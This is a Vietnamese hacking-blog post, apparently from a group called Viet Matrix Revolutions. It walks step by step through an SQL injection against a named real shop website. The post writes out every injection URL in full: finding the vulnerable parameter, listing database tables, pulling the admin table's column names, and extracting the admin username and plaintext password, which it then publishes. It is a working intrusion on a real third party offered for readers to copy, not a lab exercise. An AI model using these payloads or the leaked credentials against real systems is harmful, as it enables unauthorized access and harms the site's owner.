Trang chủ > Hacker - Xâm Nhập > Xâm nhập website http://shishavn.com

Xâm nhập website http://shishavn.com

Dạo này nghe báo chí nói về giới trẻ và trào lưu hút shisha .AlexBTP cũng tò mò tìm hiểu thử  shisha là gì lang thang với người yêu mang “google” thì đụng phải đại lý duy nhất bán shisha tại Việt Nam . Cũng vì tính tò mò xâm nhập vào đó xem có gì không !

P/s: Bạn nào copy link thực hiện truy vấn bên dưới bài nên chú ý khoảng trắng xuống dòng vì alxbtp phải xuống dòng cho dòng chữ nằm trong 1 trang

Chú thích trong bài :

Table và colum bạn hiểu như thế này

Table tương tự như các thành viên trong 1 nhà (1 thành viên là 1  table)

Còn columns là quyền hạn của 1 thành viên trong gia đình [Trong 1 gia đình người cha là người có quyền cao nhất chẳng hạn , người cha tương tự như  table chứa thông tin admin ]

Xâm nhập Shishavn - Viet Matrix Revolutions

Xâm nhập Shishavn - Viet Matrix Revolutions

Sau khi xem xét thì em Shisha này bị lỗi ở đây

http://shishavn.com/cat_detail.asp?cdid=64′ [Thêm dấu nháy phía sau ]

Và đây là  lỗi

Xâm nhập Shisha - Viet Matrix Revolutions

Xâm nhập Shisha - Viet Matrix Revolutions

Tiếp theo lấy table đầu tiên nào :

http://shishavn.com/cat_detail.asp?cdid=64%27%20and%201=convert(int

(select%20top%201%20table_name%20from%20information_schema.tables))

–sp_password

Lấy tables đầu tiên - Viet Matrix Revolutions

Lấy tables đầu tiên - Viet Matrix Revolutions

Và lấy tiếp các table tiếp theo , đến tbl_admin thì alexbtp dừng lại vì có khả năng table này chứa thông tin admin

http://shishavn.com/cat_detail.asp?cdid=64%27%20and%201=convert(int,(select%20top%201%20table_name%20

from%20information_schema.tables%20

where%20table_name%20not%20in%20(%27tbl_Cat%27,%27

tbl_News%27,%27tbl_intro%27,%27tbl_ECat%27,%27

tbl_ECatDetail%27,%27tbl_ENews%27,%27tbl_Cat1%27%27tbl_CatDetail%27,%27tbl_Cat1%27,%20%27tbl_CatDetail%27)))–sp_password

Đến tbl_admin có khả năng chứa thông tin user và pass admin thì dừng lại

Đến tbl_admin có khả năng chứa thông tin user và pass admin thì dừng lại

Và tiếp theo là lấy columns của table tbl_admin

http://shishavn.com/cat_detail.asp?cdid=64%27%20and%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20

where%20table_name=%27tbl_admin%27))–sp_password

Columns đầu tiên ở tables tbl_admin

Columns đầu tiên ở tables tbl_admin

Ok giờ đã có colums username ở table tbl_admin

giờ lấy tiếp columns tiếp theo

http://shishavn.com/cat_detail.asp?cdid=64%27%20and%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=%27

tbl_admin%27%20and%20column_name%20not%20in(%27username%27%20)))–sp_password

Columns tiếp theo của tables tbl_admin

Columns tiếp theo của tables tbl_admin

Đến đây có columns pass thuộc table tbl_admin

[Đến đây alexbtp dừng lại được rồi ai thích thì tiếp tục ]

Vậy là đã có columns : username , pass ở table tbl_admin

giờ lấy user và pass nào

Đầu tiên lấy user

http://shishavn.com/cat_detail.asp?cdid=64%27%20and%201%20=%20convert(int,(select%20top%201%20username%20%20from%20tbl_admin%20))–sp_password

Lấy user login admin - Viet Matrix Revolutions

Lấy user login admin - Viet Matrix Revolutions

Ok có user là admin

giờ lấy pass nào

http://shishavn.com/cat_detail.asp?cdid=64%27%20and%201%20=%20convert

(int,(select%20top%201%20pass%20

from%20tbl_admin%20))–sp_password

Lấy user login vào admin - Viet Matrix Revolutions

Lấy user login vào admin - Viet Matrix Revolutions

Ok có pass là minh12345

giờ  chỉ việc tìm link admin và login vào thế là xong

Phần link admin các bạn tự tìm nha , alexbtp không public link admin các bạn thông cảm

Toàn quyền thuộc Viet Matrix Revolutions – Ghi rõ nguồn khi phát hành lại thông tin này

Anderson_neo , AlexBTP , Trina_Lan and member Viet Matrix Revolutions

  1. Nguyen Tuan Viet
    Tháng Sáu 1, 2009 lúc 11:47 chiều

    Mình muốn liên hệ trực tiếp với các bạn để nhờ giúp đỡ một số công việc. Nếu có thể thì liên hệ với mình qua địa chỉ email: tuanviet75@gmail.com. Rất cám ơn các bạn đã quan tâm.

  1. No trackbacks yet.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: